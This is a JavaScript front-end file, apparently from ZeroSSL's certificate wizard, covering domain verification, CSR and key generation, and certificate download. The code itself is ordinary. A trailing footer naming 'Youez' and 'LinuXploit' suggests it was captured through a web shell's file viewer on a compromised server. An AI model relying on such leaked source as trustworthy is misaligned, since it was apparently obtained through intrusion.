/* VALIDATE - UPDATE VERIFICATION SUMMARY CHOSEN EMAIL ON CHANGE OF EMAIL SELECT */
body.on('change', '[name=&quot;wizard[validate][method][email][selected_email]&quot;]', function(event) {

	updateVerificationSummary();

});


/* VALIDATE - UPDATE VERIFICATION SUMMARY CHOSEN EMAIL */
function updateVerificationSummary() {

	body.find('[data-verification-summary]').each(function() {

		var chosenMethod = body.find('[name=&quot;wizard[validate][method]&quot;]:checked').attr('data-method-id');
		var methodContent;

		var thisDomain = $(this).attr('data-verification-summary');
		var chosenEmailForThisDomain = body.find('[data-domain=&quot;'+thisDomain+'&quot;] [name=&quot;wizard[validate][method][email][selected_email]&quot;]').val();

		const fileUploadType = body.find('[name=&quot;file_upload_type&quot;]:checked').val().toUpperCase();

		switch (chosenMethod) {

			case 'wizard[validate][method][email]':
			methodContent = '&lt;span class=&quot;custom&quot; data-tooltip=&quot;Send to: '+chosenEmailForThisDomain+'&quot;&gt;Email Verification&lt;/span&gt;';
			break;

			case 'wizard[validate][method][cname]':
			methodContent = 'DNS (CNAME)';
			break;

			case 'wizard[validate][method][file]':
			methodContent = `${fileUploadType} File Upload`;
			break;

		}

		// add method content
		$(this).find('[data-summary-item=&quot;method&quot;]').html(methodContent);

		// reset all statuses to default
		$(this).find('[data-summary-item=&quot;status&quot;]').attr('class', 'status');
		$(this).find('[data-summary-item=&quot;status&quot;] span').text('To start, click &quot;Verify Domains&quot;');

	});

}


/* VALIDATE - CANCEL AND START NEW */
body.on('click', '[data-action=&quot;wizard[validate][start_new]&quot;]', function(event) {

	event.preventDefault();

	goToPage('/certificate/verify/'+currentID, 'verify', 'verify', null, currentID, false, ['show', 'info', 'You can now start fresh verifying your domains. Need help? &lt;a target=&quot;_blank&quot; href=&quot;https://help.zerossl.com/hc/en-us/articles/360058295354-Verify-Domains&quot;&gt;Read this article&lt;/a&gt; to learn about domain verification.'], null);

});

function getCaaError(data) {
	if (!data) {
		return;
	}
	let domainLabel = data.message.details.length === 1 ? &quot;domain is&quot; : &quot;domains are&quot;;
	let domainListItems = &quot;&quot;;
	$.each(data.message.details, function(domain) {
		domainListItems += `&lt;li&gt;${data.message.details[domain]}&lt;/li&gt;`
	});

	return `It appears that the CAA records for the following ${domainLabel} not configured to allow us to issue SSL certificates.
		&lt;ul&gt;
			${domainListItems}
		&lt;/ul&gt;
		&lt;p&gt;To resolve this issue:&lt;/p&gt;
		&lt;ul&gt;
			&lt;li&gt;Remove all existing CAA records from your domain's DNS settings or&lt;/li&gt;
			&lt;li&gt;Add a CAA record to your domain's DNS with sectigo.com (ZeroSSL\'s root CA) as the authorized certificate authority.&lt;/li&gt;
		&lt;/ul&gt;
		&lt;p&gt;
			Please update your DNS settings and try again. If you need further assistance, visit our 
			&lt;a href=&quot;https://help.zerossl.com/hc/en-us/articles/360060119753-Invalid-CAA-Records&quot; target=&quot;_blank&quot;&gt;Help Center&lt;/a&gt;.
		&lt;/p&gt;
	`;
}


/* VALIDATE - SUBMIT WIZARD */
function submitValidateWizard() {

	generalInfo('hide');

	var button = body.find('[data-action=&quot;wizard[validate][submit]&quot;]');
	button.addClass('loading');

 	// cert hash
	var certificateHash = currentID;

	// selected verification method
	var selectedMethod = body.find('[data-step-id=&quot;wizard[validate][domain]&quot;]:first [name=&quot;wizard[validate][method]&quot;]:checked').attr('data-method-id');
	var submitMethod;

	// Get the type of file upload (http/https)
	const fileUploadType = body.find('[name=&quot;file_upload_type&quot;]:checked').val();

	switch (selectedMethod) {

		case 'wizard[validate][method][email]':
		submitMethod = 'EMAIL';
		break;

		case 'wizard[validate][method][cname]':
		submitMethod = 'CNAME_CSR_HASH';
		break;

		case 'wizard[validate][method][file]':
		submitMethod = fileUploadType === 'https' ? 'HTTPS_CSR_HASH' : 'HTTP_CSR_HASH';
		break;

	}

	// selected verification emails
	var arrayVerificationEmails = [];
	var submitVerificationEmails;

	if (selectedMethod === 'wizard[validate][method][email]') {

		body.find('[name=&quot;wizard[validate][method][email][selected_email]&quot;]').each(function() {
		arrayVerificationEmails.push($(this).val());
		});

		submitVerificationEmails = arrayVerificationEmails.join(',');

	}

	var	postData = {
		id: certificateHash,
		validation_method: submitMethod,
		validation_email: submitVerificationEmails,
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	$.ajax({
		type: 'POST',
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_validate_certificate',
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
			//alert(textStatus + ', ' + errorThrown);
		},
		success: function(data){

			if (data.success === 1) {

				// lock domain steps permanently
				body.find('[data-step-id=&quot;wizard[validate][domain]&quot;]').addClass('locked_permanently');

				switch (submitMethod) {

					case 'EMAIL':

						goToPage('/certificate/verify/'+currentID+'/status', 'verify', 'verify', 'status', currentID, false, ['show', 'info', 'An email with a verification link has been sent for each of the domains in your certificate.', 'li.step.finalize .alerts'], null);

					break;

					case 'CNAME_CSR_HASH':
					case 'HTTP_CSR_HASH':
					case 'HTTPS_CSR_HASH':

						generalInfo('show', 'success', 'Redirecting ...');

						goToPage('/certificate/install/'+currentID, 'install', 'install', '', currentID, false, ['show', 'info', 'Congratulations, your domains have been verified. This means that our system is issuing your certificate at the moment. This page will refresh automatically every few seconds.'], null);

					break;

				}

			} else {

				button.removeClass('loading');

				var partialSuccessCount = 0;
				var isCaaError;

				if (data.message.details) {

					// check for partial success
					$.each(data.message.details, function(domain) {

						// mark domains verified
						if (data.message.details[domain].validation_successful == true) {

							partialSuccessCount ++;

							// mark domain verified
							body.find('[data-verification-summary=&quot;'+domain+'&quot;] [data-summary-item=&quot;status&quot;]').attr('class', 'status validation_complete');
							body.find('[data-verification-summary=&quot;'+domain+'&quot;] [data-summary-item=&quot;status&quot;] span').text('Verified');

						} else {
							// check for CAA error
							if (data.message.type === 'invalid_caa_records_detected') {

								isCaaError = true;

								body.find('[data-verification-summary=&quot;'+data.message.details[domain]+'&quot;] [data-summary-item=&quot;status&quot;]').attr('class', 'status failed');
								body.find('[data-verification-summary=&quot;'+data.message.details[domain]+'&quot;] [data-summary-item=&quot;status&quot;] span').text('Invalid CAA Records');

								return;

							}

							// check for partial success in sub-folders of response
							$.each(data.message.details[domain], function(domainSubFolder) {

                                let validationResultDetails = data.message.details[domain][domainSubFolder];

								if (!!validationResultDetails[&quot;validation_successful&quot;]) {
                                    // if contains www, strip this away and simply mark non-www version completed
                                    if (domainSubFolder.indexOf('www.') &gt;= 0) {
                                        domainSubFolder = domainSubFolder.replace(/www./, '');
                                    }

                                    partialSuccessCount++;

                                    // mark domain verified
                                    body.find('[data-verification-summary=&quot;' + domain + '&quot;] [data-summary-item=&quot;status&quot;]').attr('class', 'status validation_complete');
                                    body.find('[data-verification-summary=&quot;' + domain + '&quot;] [data-summary-item=&quot;status&quot;] span').text('Verified');

								} else {
								    // in case of failure
                                    let message = &quot;&quot;;
                                    let messageDetails = validationResultDetails[&quot;error_info&quot;] ??
                                        &quot;An unknown error has occurred. Check status.zerossl.com and try again later. Contact our support team if the problem persists.&quot;;
                                    switch (validationResultDetails[&quot;error_slug&quot;]) {
                                        case 'http_transport_failed':
                                            message = &quot;HTTP transport error&quot;;
                                            break;
                                        case 'bad_response_code':
                                            message = &quot;Bad response code&quot;;
                                            break;
                                        case 'timeout':
                                            message = &quot;Timeout&quot;;
                                            break;
                                        case 'bad_file_content':
                                            message = &quot;Bad file content&quot;;
                                            break;
                                        case 'wrong_file_content':
                                            message = &quot;Wrong file content&quot;;
                                            break;
                                        default:
                                            message = &quot;Unknown error&quot;;
                                            break;
                                    }

                                    body.find('[data-verification-summary=&quot;'+domain+'&quot;] [data-summary-item=&quot;status&quot;]').attr('class', 'status failed');
									body.find('[data-verification-summary=&quot;'+domain+'&quot;] [data-summary-item=&quot;status&quot;] span').html(escapeHtml(message) + ' &lt;i data-tooltip=&quot;' + escapeHtml(messageDetails) + '&quot;&gt;&lt;/i&gt;');
                                }
							});
						}
					});
				}

				var errorMessageText;

				switch (submitMethod) {

					case 'EMAIL':

						if (isCaaError === true) {
							errorMessageText = getCaaError(data);
						} else {
						// if email verification cannot be initiated, simply go to status status page
						// would show current verification status if cert status is already pending_validation
						// if cert status is still draft, user will simply retart validation on the target page
						goToPage('/certificate/verify/'+currentID+'/status', 'verify', 'verify', 'status', currentID, false, null, null);
						return false;
						}

					break;

					case 'CNAME_CSR_HASH':

						var plural = partialSuccessCount &gt; 1 ? 'entries' : 'entry';

						if (partialSuccessCount &gt; 0) {
						    errorMessageText = 'We were able to verify '+partialSuccessCount+' CNAME '+plural+', but not all of them. Please check for errors and try again.'
						} else {
							if (isCaaError) {
								errorMessageText = getCaaError(data);
							} else {
								errorMessageText = 'We were unable to verify your CNAME entry. Please check for errors on your side and try again in 5-10 minutes.';
							}
						}

					break;

					case 'HTTP_CSR_HASH':
					case 'HTTPS_CSR_HASH':

						var plural = partialSuccessCount &gt; 1 ? 'files' : 'file';

						if (partialSuccessCount &gt; 0) {
						    errorMessageText = 'We were able to verify '+partialSuccessCount+' uploaded '+plural+', but not all of them. Please check for errors and try again.'
						} else {
							if (isCaaError) {
								errorMessageText = getCaaError(data);
							} else {
								errorMessageText = 'We were unable to verify your uploaded file. Please check for errors on your side and try again after 5-10 minutes.'
							}
						}

					break;

				}

				generalInfo('show', 'error', errorMessageText, 'li.step.finalize .alerts');
				return false;

			}

		}

	});

}


/* VALIDATE - TRIGGER SUBMISSION */
body.on('click', '[data-action=&quot;wizard[validate][submit]&quot;]', function(event) {

	event.preventDefault();

	// submit validation
	submitValidateWizard();

});


/* VALIDATE - RESEND VERIFICATION EMAIL */
body.on('click', '[data-action=&quot;wizard[validate][resend_email]&quot;]', function(event) {

	var button = $(this);
	button.addClass('loading');

	var certHash = currentID;

	var	postData = {
		id: certHash
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	$.ajax({
		type: 'POST',
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_resend_validation_email',
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
			//alert(textStatus + ', ' + errorThrown);
		},
		success: function(data){

			button.removeClass('loading');

			if (data.success === 1) {

				generalInfo('show', 'success', 'Your verification email has been resent. Trouble receiving it? &lt;a target=&quot;_blank&quot; href=&quot;https://help.zerossl.com/hc/en-us/articles/360060120053-Email-Verification-Troubleshooting&quot;&gt;Reading this article&lt;/a&gt; could help resolve the issue.', 'li.step.finalize .alerts');

			}  else {

				generalInfo('show', 'error', translateError(data.message), 'li.step.finalize .alerts');
				return false;

			}

		}

	});

});


/* VALIDATE - REFRESH STATUS */
body.on('click', '[data-action=&quot;wizard[validate][refresh_validation_status]&quot;]', function(event) {

	var button = $(this);
	button.addClass('loading');

	reloadPage();

});


/* INSTALL - DOWNLOAD CERT */
body.on('click', '[data-action=&quot;wizard[install][download_certificate]&quot;]', function(event) {

	var button = $(this);
	button.addClass('loading');

	var certHash;

	if ($(this).attr('data-action-id')) {
	certHash = $(this).attr('data-action-id');
	} else {
	certHash = currentID;
	}

	var certCommonName = $(this).attr('data-action-filename');

	var	postData = {
		id: certHash
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	$.ajax({
		type: 'POST',
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_download_raw_certificate&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
			//alert(textStatus + ', ' + errorThrown);
		},
		success: function(data){

			button.removeClass('loading');

			if (data.success === 1) {

				// store certificate files
				var certificate = data.message['certificate.crt'];
				var certificateCaBundle = data.message['ca_bundle.crt'];

				// handle encrypted private key and decrypt it
				var encryptedPrivateKey;
				var decryptedPrivateKey;
				var includePrivatekey = false;

				// if there is an encrypted private key returned from server
				if (data.message['private.key']) {

					// try decrypting private key
                    try {

						// include private key in ZIP
						includePrivatekey = true;

						// store encrypted private key
						encryptedPrivateKey = data.message['private.key'];

						// decrypt encrypted private key
						decryptedPrivateKey = decryptPrivateKey(encryptedPrivateKey);

						// do not include private key in ZIP if decrypted private key is invalid
						if (decryptedPrivateKey.indexOf('BEGIN RSA PRIVATE KEY') &lt; 1) {
						includePrivatekey = false;
						}

					// if decryption does not work, do not include private key
                    } catch(error) {

                        console.log(error);
                        includePrivatekey = false;

                    }

				}

				// generate ZIP from certificate files and private key
				var zip = new JSZip();
				zip.file('certificate.crt', certificate);
				zip.file('ca_bundle.crt', certificateCaBundle);

				// include private key only if it is returned from server
				if (includePrivatekey === true) {
				zip.file('private.key', decryptedPrivateKey);
				}

				zip.generateAsync({type:&quot;blob&quot;})
				.then(function(content) {

					// download zip file
					saveData(content, certCommonName+ '.zip', 'application/zip');

				});

				/* https://stuk.github.io/jszip/ */

			}  else {

				generalInfo('show', 'error', translateError(data.message), 'li.step.open .alerts');
				return false;

			}

		}

	});





	return;

	var isRealButton = false;

	if ($(this).closest('ul').attr('data-dropdown')) {
	generalInfo('show', 'success', 'Preparing your certificate for download ...');
	} else {
	button.addClass('loading');
	isRealButton = true;
	}

	setTimeout( function(){

		if ($(this).closest('ul').attr('data-dropdown')) {
		generalInfo('hide');
		} else {
		button.removeClass('loading');
		}

	}, 5000);

});



/* INSTALL - HTTPS CHECK */
body.on('click', '[data-action=&quot;wizard[install][https_check]&quot;]', function(event) {

	var button = $(this);
	button.addClass('loading');

	var urlToCheck = body.find('[name=&quot;wizard[install][url_to_check]&quot;]').val();

	var	postData = {
		domain: urlToCheck
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	$.ajax({
		type: 'POST',
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_check_domain_ssl',
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
			//alert(textStatus + ', ' + errorThrown);
		},
		success: function(data){

			button.removeClass('loading');

			if (data.message.has_valid_certificate === 1) {

				body.find('li.step').removeClass('open');
				body.find('li.step:not(.finalize)').addClass('complete').addClass('locked_permanently');

				body.find('li.step.finalize').removeClass('locked_permanently').addClass('open').addClass('complete');

			} else {

                if(data.message.has_valid_certificate === null) {
                    generalInfo('show', 'info', 'This check is currently not working for certificates primarily issued for an IPv4 or IPv6 address.', 'li.step.open .alerts');
                    body.find('li.step.finalize').removeClass('locked_permanently').addClass('open').addClass('complete');
                } else {
                    generalInfo('show', 'error', 'It looks like your certificate has not been installed yet. Please check for errors and try again.', 'li.step.open .alerts');
                    return false;
                }
			}

		}

	});

});



/* INSTALL - SWITCH BETWEEN SERVER TYPES */
body.on('change', '[name=&quot;wizard[install][server_type]&quot;]', function(event) {

	var chosenValue = $(this).val();

	body.find('[data-server-type]').hide();
	body.find('[data-server-type=&quot;'+chosenValue+'&quot;]').show();

});



/* FORGE - GENERATE KEY PAIR */
function generateKeyPair(csrArray) {

	// generate a key pair
	var keys = forge.pki.rsa.generateKeyPair(2048);

	// store csr values, if not available -&gt; use defaults
	var csrCommonName = csrArray[0];
	var csrOrganizationName = /*csrArray[1] ? csrArray[1] :*/ 'Organization';
	var csrOrganizationUnitName = /*csrArray[2] ? csrArray[2] :*/ 'Department';
	var csrLocalityName = /*csrArray[3] ? csrArray[3] :*/ 'Locality';
	var csrState = /*csrArray[4] ? csrArray[4] :*/ 'State';
	var csrCountryName = /*csrArray[5] ? csrArray[5] :*/ 'US';
	var csrEmailAddress = 'cert_inbox@zerossl.com'; // unused

	// common name must be present
	if (!csrArray[0]) {
	console.log('Error: Commmon Name empty, CSR cannot be generated');
	return false;
	}

	// create a certification request (CSR)
	var csr = forge.pki.createCertificationRequest();
	csr.publicKey = keys.publicKey;
	csr.setSubject([{
	  name: 'commonName',
	  value: csrCommonName
	}, /*{
	  name: 'emailAddress',
	  value: csrEmailAddress
	},*/ {
	  name: 'countryName',
	  value: csrCountryName
	}, {
	  shortName: 'ST',
	  value: csrState
	}, {
	  name: 'localityName',
	  value: csrLocalityName
	}, {
	  name: 'organizationName',
	  value: csrOrganizationName
	}, {
	  shortName: 'OU',
	  value: csrOrganizationUnitName
	}]);

	// sign certification request
	csr.sign(keys.privateKey);

	// verify certification request
	var verified = csr.verify();

	// convert certification request to PEM-format
	var csrPem = forge.pki.certificationRequestToPem(csr);

	// store private key in Forge format
	var privateKey = keys.privateKey;

	// store private key in PEM format - unused!
	var privateKeyPem = forge.pki.privateKeyToPem(keys.privateKey);

	// convert a Forge private key to an ASN.1 RSAPrivateKey
	var rsaPrivateKey = forge.pki.privateKeyToAsn1(privateKey);

	// wrap an RSAPrivateKey ASN.1 object in a PKCS#8 ASN.1 PrivateKeyInfo
	var privateKeyInfo = forge.pki.wrapRsaPrivateKey(rsaPrivateKey);

	// encrypt private key with our encryption key
	var encryptionKey = getEncryptionKey();

	var privateKeyEncrypted = forge.pki.encryptPrivateKeyInfo(
	  privateKeyInfo, encryptionKey, {
		algorithm: 'aes256',
	  });

	// convert encrypted private key to PEM
	var privateKeyEncryptedPem = forge.pki.encryptedPrivateKeyToPem(privateKeyEncrypted);

	return {
		csr: csrPem,
		privateKeyEncrypted: privateKeyEncryptedPem
	}

	/* https://github.com/digitalbazaar/forge#pkcs8 */
	/* https://github.com/digitalbazaar/forge#pkcs10 */

}



function decryptPrivateKey(encryptedPrivateKey) {

	// we need our encryption key for decryption
	var encryptionKey = getEncryptionKey();

	// decrypts a PEM-formatted, encrypted private key
	var decryptedPrivateKey = forge.pki.decryptRsaPrivateKey(encryptedPrivateKey, encryptionKey);

	// store decrypted private key in PEM format
	var decryptedPrivateKeyPem = forge.pki.privateKeyToPem(decryptedPrivateKey);

	return decryptedPrivateKeyPem;

}



/* INVALIDATE ALL PRIVATE KEYS */
function invalidateAllPrivateKeys() {

	$.ajax({
		type: 'POST',
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_invalidate_private_keys&amp;_cpt=' + getCookie('_cpt'),
		error: function(XMLHttpRequest, textStatus, errorThrown) {
			alert(textStatus + ', ' + errorThrown);
		},
		success: function(data){

			if (data.success === 1) {

				//console.log('invalidateAllPrivateKeys: Success');

			}  else {

				//console.log('invalidateAllPrivateKeys: Error');

			}

		}

	});

}


/* INSTALL - START AUTO REFRESH FUNCTION */
function startAutoRefresh() {

	// refrsh every 15 seconds if user idle time under a minute
	autoRefreshInterval = setInterval(function() {

		// reload page, maximum 100 times
		if (autoRefreshCount &lt; 100) {

			// increase counter by one
			autoRefreshCount ++;

			// reload page
			reloadPage();

		}

	}, 15000);

}

/* INSTALL - STOP AUTO REFRESH FUNCTION */
function stopAutoRefresh() {

	// stop auto refresh
	clearInterval(autoRefreshInterval);

}


/* HIDE SSL FOR FREE NOTICE */
body.on('click', '[data-action=&quot;hide_sslforfree_notice&quot;]', function() {

	body.find('.notice.sslforfree').remove();

});


/* AJAX - RESET ACCESS KEY */
body.on('click', '[data-action=&quot;generate_eab_credentials&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var button = $(this);

	button.addClass('loading');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_create_acme_eab_account&amp;_cpt=' + getCookie('_cpt'),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			button.removeClass('loading');

			if (data.success === 1) {

				var	customData = {
					eab_kid: data.message.eab_kid,
					eab_hmac_key: data.message.eab_hmac_key
				};

				openPopup('view_eab_credentials', customData);

			}  else {

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

});


/* HANDLE ZENDESK WIDGET */
function handleZendeskWidget() {

	var suppressWidgetContactForm = false;

	if (body.find('[name=&quot;user[subscription_id]&quot;]').val() == 477 || body.find('[name=&quot;user[subscription_id]&quot;]').val() == 634) {
	suppressWidgetContactForm = true;
	}

	window.zESettings = {
	  webWidget: {
		contactForm: {
		  suppress: suppressWidgetContactForm
		},
		helpCenter: {
		  suppress: false
		},
	  }
	};

}

// for removing certain default domain variants added by default (e.g. www)
$(document).on('click','.domain .remove_domain', function () {
    let wwwonly = &quot;false&quot;;
    if($(this).attr(&quot;data-removeDomain&quot;) === &quot;root&quot;) {
        wwwonly = &quot;true&quot;;
    }

    $(this).hide();
    $(this).prev().hide();
    body.find(`[name=&quot;wizard[order][domains][domain]strict_domains&quot;]`).val(&quot;true&quot;).attr(&quot;data-wwwonly&quot;,wwwonly)
});

// Plans toggle Monthly/Yearly prices
$('body').on('change', '[name=&quot;payment_freq&quot;]', function() {
	$('.plans').toggleClass('yearly');
	var frequency = $(this).is(':checked') ? 'yearly' : 'monthly';
	$('.savings-element').toggleClass('enabled');
	body.find('[name=&quot;user[payment_frequency]&quot;]').val(frequency);
});

$('body').on('change', '[name=&quot;enable_protection&quot;]', function() {
	$('body').toggleClass('protection-enabled');
	$('.protection-element').toggleClass('enabled');
	if ($('.protection-element').hasClass('enabled')) {
		$('.protection-element').html('Enabled');
	} else {
		$('.protection-element').html('Disabled');
	}
	$('.protection-plan, .no-protection-plan, .features.protection-details').not('.current-plan').toggleClass(&quot;hidden&quot;);
});

$('body').on('click', '[name=&quot;file_upload_type&quot;]', function() {
	const fileUploadType = $(this).val();
	$(&quot;.http-file-element, .https-file-element&quot;).hide();
	$(`.${fileUploadType}-file-element`).show();

	updateVerificationSummary();
});</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>